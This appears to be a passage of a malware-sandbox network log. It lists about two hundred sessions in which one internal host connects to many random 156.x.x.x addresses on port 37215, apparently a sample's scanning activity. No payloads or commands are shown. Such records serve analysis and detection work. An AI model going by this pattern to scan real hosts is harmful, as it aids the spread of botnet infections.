                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6899192.168.2.1536308156.204.165.19237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6900192.168.2.1553006156.139.232.1337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6901192.168.2.1545594156.193.134.15737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6902192.168.2.1550692156.48.44.24737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6903192.168.2.1539434156.70.29.22437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6904192.168.2.1539196156.223.96.24537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6905192.168.2.1545516156.251.36.3737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6906192.168.2.1549622156.101.138.24437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6907192.168.2.1548040156.203.119.22037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6908192.168.2.1533348156.124.233.21437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6909192.168.2.1532786156.219.217.25037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6910192.168.2.1539704156.50.254.4437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6911192.168.2.1535664156.122.84.16537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6912192.168.2.1542274156.50.228.17037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6913192.168.2.1548928156.91.149.13137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6914192.168.2.1540812156.53.126.1837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6915192.168.2.1533728156.183.81.16237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6916192.168.2.1545324156.127.201.3637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6917192.168.2.1559070156.16.104.6937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6918192.168.2.1548364156.184.186.8437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6919192.168.2.1549422156.184.62.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6920192.168.2.1536306156.205.245.25237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6921192.168.2.1554532156.34.231.18637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6922192.168.2.1557748156.226.37.15837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6923192.168.2.1540384156.172.182.5537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6924192.168.2.1543130156.141.159.7637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6925192.168.2.1550532156.151.235.19937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6926192.168.2.1553414156.114.139.19337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6927192.168.2.1552258156.242.167.6637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6928192.168.2.1543868156.218.68.8437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6929192.168.2.1556630156.15.53.13137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6930192.168.2.1543326156.156.91.19337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6931192.168.2.1559660156.131.199.3737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6932192.168.2.1556422156.176.152.2037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6933192.168.2.1545614156.68.205.22137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6934192.168.2.1551014156.242.250.15837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6935192.168.2.1535242156.39.91.17737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6936192.168.2.1559652156.108.206.25237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6937192.168.2.1539962156.154.0.22837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6938192.168.2.1555298156.181.228.11337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6939192.168.2.1545332156.84.99.8137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6940192.168.2.1540470156.132.83.17637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6941192.168.2.1557568156.29.154.13237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6942192.168.2.1554980156.44.46.21637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6943192.168.2.1536450156.82.7.9737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6944192.168.2.1548880156.197.123.15937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6945192.168.2.1545578156.56.48.12737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6946192.168.2.1533942156.106.165.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6947192.168.2.1553976156.37.183.21337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6948192.168.2.1533312156.214.14.10337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6949192.168.2.1555584156.132.206.16437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6950192.168.2.1543666156.89.119.637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6951192.168.2.1555362156.55.164.12837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6952192.168.2.1547474156.98.142.16337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6953192.168.2.1554068156.49.109.15837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6954192.168.2.1551508156.116.84.5937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6955192.168.2.1539798156.149.142.14237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6956192.168.2.1551164156.85.125.7937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6957192.168.2.1538494156.234.144.24537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6958192.168.2.1546090156.153.211.18137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6959192.168.2.1544618156.111.237.12137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6960192.168.2.1536738156.145.176.18737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6961192.168.2.1548178156.252.13.3837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6962192.168.2.1536386156.176.29.3137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6963192.168.2.1545684156.58.77.837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6964192.168.2.1538534156.71.36.6337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6965192.168.2.1546174156.42.167.6537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6966192.168.2.1549762156.21.35.21237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6967192.168.2.1543160156.208.130.6837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6968192.168.2.1538122156.136.7.8837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6969192.168.2.1559472156.85.27.8137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6970192.168.2.1536610156.42.200.13937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6971192.168.2.1556126156.209.89.11237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6972192.168.2.1541420156.29.147.2637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6973192.168.2.1533164156.230.46.11537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6974192.168.2.1552226156.164.64.24537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6975192.168.2.1534488156.193.226.5937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6976192.168.2.1535316156.70.57.16337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6977192.168.2.1555328156.207.6.9537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6978192.168.2.1556208156.182.138.5137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6979192.168.2.1555686156.91.58.8537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6980192.168.2.1537954156.93.40.22537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6981192.168.2.1554378156.106.10.24037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6982192.168.2.1542704156.132.41.8937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6983192.168.2.1539158156.74.132.19237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6984192.168.2.1542938156.32.136.8137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6985192.168.2.1552068156.45.187.4237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6986192.168.2.1541132156.135.70.7537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6987192.168.2.1541948156.88.142.11937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6988192.168.2.1534466156.51.135.437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6989192.168.2.1544794156.104.34.15537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6990192.168.2.1556584156.136.164.25037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6991192.168.2.1534414156.70.94.18537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6992192.168.2.1547518156.158.38.6937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6993192.168.2.1553814156.222.118.18737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6994192.168.2.1558688156.235.144.11037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6995192.168.2.1559208156.177.155.3637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6996192.168.2.1540446156.60.98.12337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6997192.168.2.1552528156.10.31.4437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6998192.168.2.1560088156.146.211.19237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6999192.168.2.1535704156.104.21.11537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7000192.168.2.1550264156.81.26.13837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7001192.168.2.1558518156.237.40.18237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7002192.168.2.1552672156.124.101.25037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7003192.168.2.1551024156.243.212.3537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7004192.168.2.1545980156.222.45.17237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7005192.168.2.1555148156.202.108.3537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7006192.168.2.1547898156.107.179.24237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7007192.168.2.1544336156.127.35.7937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7008192.168.2.1557162156.71.220.2137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7009192.168.2.1554062156.186.236.6637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7010192.168.2.1553626156.127.11.21037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7011192.168.2.1558868156.117.217.1337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7012192.168.2.1536702156.65.196.19737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7013192.168.2.1538104156.234.175.1437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7014192.168.2.1544492156.142.20.19837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7015192.168.2.1551050156.101.99.7037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7016192.168.2.1547302156.210.240.22737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7017192.168.2.1560972156.155.189.24537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7018192.168.2.1549510156.145.212.2537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7019192.168.2.1555430156.48.111.20137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7020192.168.2.1540694156.34.172.17537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7021192.168.2.1540336156.202.84.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7022192.168.2.1538212156.175.146.5037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7023192.168.2.1558832156.132.70.24937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7024192.168.2.1560608156.250.63.19437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7025192.168.2.1558110156.140.153.10337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7026192.168.2.1557072156.217.140.4437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7027192.168.2.1548716156.67.66.13137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7028192.168.2.1552186156.253.237.15637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7029192.168.2.1534090156.166.56.037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7030192.168.2.1549774156.210.27.9437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7031192.168.2.1537992156.178.191.21037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7032192.168.2.1542540156.185.185.13737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7033192.168.2.1554138156.98.180.11437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7034192.168.2.1552552156.105.40.22337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7035192.168.2.1560250156.23.207.16737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7036192.168.2.1556406156.65.100.4037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7037192.168.2.1538738156.185.106.17937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7038192.168.2.1558012156.242.208.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7039192.168.2.1534558156.215.250.17937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7040192.168.2.1547240156.66.252.11937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7041192.168.2.1556496156.182.44.23037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7042192.168.2.1534908156.185.177.1837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7043192.168.2.1554756156.110.54.1837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7044192.168.2.1541114156.69.235.21137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7045192.168.2.1537330156.191.162.10537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7046192.168.2.1545578156.212.44.7737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7047192.168.2.1550896156.61.29.18137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7048192.168.2.1550022156.79.177.24537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7049192.168.2.1554328156.49.97.5137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7050192.168.2.1553734156.55.140.20137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7051192.168.2.1555374156.166.3.537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7052192.168.2.1556890156.100.155.2037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7053192.168.2.1554454156.52.80.15937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7054192.168.2.1538484156.231.136.22537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7055192.168.2.1534722156.150.183.11237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7056192.168.2.1539102156.74.104.25237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7057192.168.2.1555008156.17.243.237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7058192.168.2.1558294156.200.141.7737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7059192.168.2.1535418156.91.208.1337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7060192.168.2.1543030156.102.189.3537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7061192.168.2.1543770156.114.191.18537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7062192.168.2.1558054156.219.52.8837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7063192.168.2.1551328156.52.114.18337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7064192.168.2.1548218156.74.189.10737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7065192.168.2.1546322156.223.78.22837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7066192.168.2.1539826156.149.15.10237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7067192.168.2.1552256156.187.188.18037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7068192.168.2.1533872156.117.11.8137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7069192.168.2.1556176156.113.28.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7070192.168.2.1553770156.165.39.13037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7071192.168.2.1534660156.237.241.5937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7072192.168.2.1549926156.48.67.16537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7073192.168.2.1538794156.104.131.12537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7074192.168.2.1545132156.22.197.937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7075192.168.2.1560328156.166.203.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7076192.168.2.1558430156.65.227.2037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7077192.168.2.1535818156.146.151.12637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7078192.168.2.1542584156.92.242.18237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7079192.168.2.1537144156.190.253.6837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7080192.168.2.1555430156.152.12.18337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7081192.168.2.1554290156.184.77.5837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7082192.168.2.1550982156.19.196.15837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7083192.168.2.1551016156.182.191.15037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7084192.168.2.1558830156.44.33.21337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7085192.168.2.1543778156.98.126.14337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7086192.168.2.1553688156.109.78.3237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7087192.168.2.1541452156.112.171.22037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7088192.168.2.1540774156.191.73.16637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7089192.168.2.1553530156.184.34.6237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7090192.168.2.1551610156.83.37.20537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7091192.168.2.1545722156.54.42.20537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7092192.168.2.1544570156.156.137.21137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7093192.168.2.1534266156.27.82.18237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7094192.168.2.1546852156.232.148.12537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7095192.168.2.1545980156.124.107.6237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7096192.168.2.1536092156.17.0.17837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7097192.168.2.1551938156.247.60.5037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7098192.168.2.1535188156.117.107.15237215
